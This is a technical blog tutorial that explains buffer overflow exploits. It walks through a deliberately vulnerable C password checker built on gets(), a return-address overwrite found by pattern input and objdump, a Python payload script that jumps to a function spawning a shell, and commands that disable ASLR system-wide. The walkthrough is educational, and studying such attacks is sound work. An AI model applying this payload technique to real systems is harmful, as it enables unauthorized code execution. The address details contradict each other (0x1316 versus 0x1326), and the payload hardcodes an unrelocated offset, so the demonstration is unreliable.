Cogs and Levers A blog full of technical stuff

Understanding Buffer Overrun Exploits

Introduction

Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.

Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.

In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.

Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.

Password Validator Example

In the following example, the program will ask for input from the user and validate it against a password stored on the server.

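#include <fcntl.h>   /* open */
#include <stdio.h>   /* printf, gets, perror */
#include <stdlib.h>  /* system */
#include <string.h>  /* string comparison */
#include <unistd.h>  /* read, close */

/* the privileged action we are trying to protect */
void do_super_admin_things() {
  system("/bin/sh");
}

int main(int argc, char *argv[]) {
  if (validate_password()) {
    do_super_admin_things();
  } else {
    printf("ERROR: Bad password\n");
  }

  return 0;
}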

do_super_admin_things stands in for any privileged functionality. It might be an admin shell, or something else. The point is that this program tries to control access to that function by making sure you have the password first!

The validate_password function is responsible for getting that password in from the outside world. It prompts, and then reads from stdin. Note the use of gets().

int validate_password() {
  char password_attempt[64];

  printf("What is the password? ");
  gets(password_attempt);

  return check_password(password_attempt);
}

Warning About gets

The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:

BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.

The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it was deprecated in the C99 standard, as per §7.26.13 (C11 later removed it from the language entirely):

The gets function is obsolescent, and is deprecated.

If there’s one thing to learn from this section, it’s don’t use gets().

To get this code to compile, I had to relax some of the standard rules and mute certain warnings:

gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1 
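For contrast, here is a minimal sketch of the bounded read that the man page recommends. The helper name read_line is hypothetical (it is not part of vuln1.c); it relies only on the standard fgets() and fgetc() calls, and it never writes more than size bytes into the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not part of vuln1.c.
 * Reads one line into buf, storing at most size - 1 characters plus a
 * terminating NUL. Returns 1 on success, 0 on end-of-file or error. */
int read_line(char *buf, size_t size, FILE *in) {
  size_t len;
  int c;

  if (size == 0 || fgets(buf, (int)size, in) == NULL) {
    return 0;
  }

  len = strlen(buf);
  if (len > 0 && buf[len - 1] == '\n') {
    /* the whole line fit: drop the newline */
    buf[len - 1] = '\0';
  } else {
    /* the line was longer than the buffer: discard the remainder */
    while ((c = fgetc(in)) != '\n' && c != EOF) {
      /* nothing to do, just consume */
    }
  }

  return 1;
}
```

Called as read_line(password_attempt, sizeof(password_attempt), stdin), an oversized input is truncated to 63 characters instead of spilling past the end of the buffer.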

Checking the Password

The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.

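int check_password(char *attempt) {
  char password[256];
  ssize_t read_bytes;
  int fd;

  if ((fd = open("./the-password", O_RDONLY)) < 0) {
    perror("open");
    return 0;
  }

  /* leave room for the terminating NUL */
  read_bytes = read(fd, password, sizeof(password) - 1);
  close(fd);

  if (read_bytes <= 0) {
    /* read error or empty file: reject the attempt */
    return 0;
  }

  password[read_bytes] = '\0';

  /* strip a single trailing newline */
  if (password[read_bytes - 1] == '\n') {
    password[read_bytes - 1] = '\0';
  }

  /* require an exact match, not just a matching prefix */
  return strcmp(password, attempt) == 0;
}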

Crashes

Initially, if you provide any normal input, the program behaves as expected:

What is the password? AAAAAAAAAAAA
ERROR: Bad password

But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1]    60406 segmentation fault (core dumped)  ./vuln1

The program crashes due to a segmentation fault. Checking dmesg gives us more information:

$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.

Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). Our input has overflowed into crucial parts of the stack, including the saved return address, which the CPU loads into the instruction pointer when the function returns.

You can verify that 0x41 represents ‘A’ by running the following command:

echo -e "\x41\x41\x41\x41"
AAAA

Controlling the Instruction Pointer

This works because the large input string overflows the password_attempt buffer. This buffer is a local variable in the validate_password function, and on the stack, local variables sit at lower addresses than the function’s saved return address. Because gets() writes toward higher addresses, the excess data runs past the end of password_attempt and overwrites that return address. Once it is overwritten, we control which address the CPU jumps to when validate_password returns.
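The overwrite can be modelled safely with a struct standing in for the stack frame. This is only a sketch: fake_frame and simulate_overflow are hypothetical names, the 12-byte gap between the buffer and the return address is an assumption that matches this particular build (the pattern experiment later in the post is what reveals it), and the copy is clamped to the size of the model so the demo itself never goes out of bounds.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical model of validate_password's frame, lowest address first.
 * The 12-byte gap is an assumption that matches this post's build only. */
struct fake_frame {
  char password_attempt[64];  /* the local buffer */
  unsigned char saved[12];    /* saved registers / padding (assumed size) */
  uint32_t return_address;    /* where the function will return to */
};

/* Copies input over the model the way an unbounded write would, clamped
 * to sizeof(struct fake_frame). Returns the resulting return address. */
uint32_t simulate_overflow(const char *input) {
  struct fake_frame frame;
  size_t len = strlen(input);

  memset(&frame, 0, sizeof frame);
  frame.return_address = 0x08049000u;  /* arbitrary placeholder value */

  if (len > sizeof frame) {
    len = sizeof frame;
  }
  memcpy(&frame, input, len);

  return frame.return_address;
}
```

With a short input the placeholder return address survives. With 80 or more A’s the function returns 0x41414141, the same value that showed up in dmesg.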

Perhaps we could find the address of the do_super_admin_things function and simply jump directly to it. The source code only gives us the function’s name; its address is fixed when the binary is built, so we need to lean on some other tools to gather this intel.

By using objdump we can take a look inside of the compiled executable and get this information.

objdump -d vuln1

This will disassemble the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):

00001316 <do_super_admin_things>:
    1316:       55                      push   %ebp
    1317:       89 e5                   mov    %esp,%ebp
    1319:       53                      push   %ebx

We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.

Now we need to find exactly where in that big group of A’s the return address sits, so that we know where to place our own address in the input. We already have some inside knowledge about our buffer: it’s 64 bytes in length.

We need a marker in the input to tell us where our address has to go. We can do that with a recognizable pattern: we re-run the program with our 64 A’s, followed by a sequence of distinct four-letter groups:

What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1]    60406 segmentation fault (core dumped)  ./vuln1

This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in dmesg now:

[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)

The 45454545 tells us which part of the input ends up as the return address: \x45 is the letter E.

echo -e "\x45\x45\x45\x45"
EEEE

That means the return address is overwritten by the E’s, which start 76 bytes into the input (64 A’s plus the 12 bytes of BBBBCCCCDDDD).
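Finding that offset by eye gets tedious with longer patterns, so the lookup can be sketched in code. The function name find_offset is hypothetical; it searches the input for the four bytes of the faulting address as they would sit in memory on a little-endian machine such as x86.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: returns the offset in input of the first
 * occurrence of the 4 bytes of fault_addr in little-endian order,
 * or -1 if they do not occur. */
long find_offset(const char *input, uint32_t fault_addr) {
  unsigned char needle[4];
  size_t len = strlen(input);
  size_t i;

  /* lay the address out the way x86 stores it in memory */
  needle[0] = (unsigned char)(fault_addr & 0xff);
  needle[1] = (unsigned char)((fault_addr >> 8) & 0xff);
  needle[2] = (unsigned char)((fault_addr >> 16) & 0xff);
  needle[3] = (unsigned char)((fault_addr >> 24) & 0xff);

  for (i = 0; i + 4 <= len; i++) {
    if (memcmp(input + i, needle, 4) == 0) {
      return (long)i;
    }
  }

  return -1;
}
```

For the input used above (64 A’s followed by BBBBCCCCDDDDEEEEFFFF) and the faulting address 0x45454545, this returns 76.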

Prepare the Payload

To make life easier, we’ll write a Python script that generates this payload for us. Note that it uses the function address we found earlier.

#!/usr/bin/env python3
import sys

# fill out the original buffer
payload =  b"A" * 64
# extra pad to skip to where we want our instruction pointer 
payload += b"BBBBCCCCDDDD"
# address of our function "do_super_admin_things"
payload += b"\x16\x13\x00\x00"

sys.stdout.buffer.write(payload)
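The address bytes in the script appear reversed because x86 stores multi-byte values least significant byte first. As a rough illustration, the same payload layout can be built in C. The name build_payload is hypothetical, and the filler here is all A’s rather than the BBBBCCCCDDDD marker.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: fills out with pad_len filler bytes followed by
 * addr in little-endian byte order. Returns the payload length, or 0 if
 * out is too small to hold it. */
size_t build_payload(unsigned char *out, size_t cap, size_t pad_len,
                     uint32_t addr) {
  if (cap < 4 || pad_len > cap - 4) {
    return 0;
  }

  /* filler up to the saved return address */
  memset(out, 'A', pad_len);

  /* least significant byte first, as x86 expects */
  out[pad_len + 0] = (unsigned char)(addr & 0xff);
  out[pad_len + 1] = (unsigned char)((addr >> 8) & 0xff);
  out[pad_len + 2] = (unsigned char)((addr >> 16) & 0xff);
  out[pad_len + 3] = (unsigned char)((addr >> 24) & 0xff);

  return pad_len + 4;
}
```

With pad_len set to 76 and addr set to 0x00001316, the last four bytes come out as 16 13 00 00, matching the b"\x16\x13\x00\x00" in the Python script.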

We can now inject this into the execution of our binary and achieve a shell:

$ (python3 payload.py; cat) | ./vuln1 

ls
input  payload.py  the-password  vuln1	vuln1.c

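We use (python3 payload.py; cat) here to keep the program’s standard input open. If we piped in the script’s output alone, stdin would reach end-of-file as soon as the script exited, and the newly spawned /bin/sh would read that end-of-file and quit immediately. Running cat afterwards forwards whatever we type to the shell.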

Static vs. Runtime Addresses

When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.

For example, if we inspect the runtime address of do_super_admin_things in GDB, we might see something like:

(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.

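This differs from the objdump address 0x1326 because it has been shifted by the base address at which the executable was loaded (0x56555000 in this case). The binary is position-independent, so objdump only shows offsets from that base, and ASLR randomizes the base on each run. GDB disables randomization by default for the programs it launches, which is why the base shown here is a fixed value.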
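The relationship between the two addresses is plain addition, sketched below with the values from the GDB session. The function names are hypothetical, and the arithmetic assumes a 32-bit process like the one built with -m32.

```c
#include <stdint.h>

/* Hypothetical helper: the runtime address is the load base plus the
 * offset that objdump reports. */
uint32_t runtime_address(uint32_t load_base, uint32_t objdump_offset) {
  return load_base + objdump_offset;
}

/* Hypothetical helper: the inverse, recovering the load base from one
 * known runtime address and its objdump offset. */
uint32_t load_base_from(uint32_t runtime_addr, uint32_t objdump_offset) {
  return runtime_addr - objdump_offset;
}
```

Plugging in the numbers above, 0x56555000 + 0x1326 gives 0x56556326, the address GDB reported.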

Temporarily Disabling ASLR for Demonstration

To make the runtime addresses predictable, we can temporarily disable ASLR. The program then loads at the same base address on every run, so a function’s runtime address is always its objdump offset plus that fixed base. This is useful for demonstration and testing purposes.

To disable ASLR on Linux, run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
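Before and after testing, it can be worth confirming which mode the kernel is actually in. The sketch below reads the same file; read_aslr_mode and describe_aslr_mode are hypothetical helper names, and the descriptions paraphrase the kernel’s documented meanings for the values 0, 1 and 2.

```c
#include <stdio.h>

/* Hypothetical helper: returns the integer stored in the file at path,
 * or -1 if the file cannot be opened or parsed. */
int read_aslr_mode(const char *path) {
  FILE *f = fopen(path, "r");
  int mode;

  if (f == NULL) {
    return -1;
  }
  if (fscanf(f, "%d", &mode) != 1) {
    mode = -1;
  }
  fclose(f);

  return mode;
}

/* Hypothetical helper: short description of each randomize_va_space value. */
const char *describe_aslr_mode(int mode) {
  switch (mode) {
  case 0:
    return "disabled";
  case 1:
    return "partial: stack, mmap base and vDSO are randomized";
  case 2:
    return "full: partial randomization plus the heap";
  default:
    return "unknown";
  }
}
```

Calling read_aslr_mode("/proc/sys/kernel/randomize_va_space") should return 2 again once ASLR has been re-enabled.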

Conclusion

In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.

Disabling ASLR temporarily gave us stable runtime addresses that map predictably onto the objdump output, making the exploit demonstration clearer. It also highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.

Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.

Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.